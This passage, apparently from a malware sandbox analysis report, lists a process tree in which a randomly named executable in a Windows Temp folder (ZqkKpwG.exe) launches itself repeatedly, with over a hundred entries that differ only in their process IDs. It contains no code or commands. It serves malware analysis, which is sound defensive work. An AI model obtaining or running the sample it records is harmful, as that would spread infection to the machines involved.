        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2340
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3612
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3156
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3892
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3252
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4304
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3864
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4544
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1384
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4860
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5936
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4704
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5652
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2380
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5608
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4564
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:880
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6024
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:568
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5268
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2520
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:976
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3732
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1144
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3960
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5104
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3288
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4640
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1352
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6008
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6128
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3540
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4224
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2372
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5728
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5472
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6012
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6080
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:240
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1984
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1736
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4292
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2144
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4948
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1052
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3868
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3804
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5828
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6020
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4236
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:228
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5940
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3004
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5724
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3980
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2296
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4204
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2448
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4680
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2996
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1788
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3100
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1824
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3668
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3116
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3820
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:928
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:644
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3456
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4800
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:956
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2208
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3236
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3492
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:340
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5200
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4552
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5192
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3508
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5956
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4312
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5064
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4496
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4924
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4252
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1136
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3628
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3800
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2912
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3576
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1124
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3552
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5976
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2724
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2264
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5552
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1672
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4480
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2364
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1224
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:476
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4392
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4968
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5980
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3400
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3932
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4844
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4780
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5324
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1820
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5136
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4280
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5088
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5280
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2784
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1972
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4156
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2640
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1436
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:2752
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5440
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4656
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3632
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3592
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4864
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:3648
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:1152
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4092
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:5424
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6152
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6160
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6168
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:6176
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
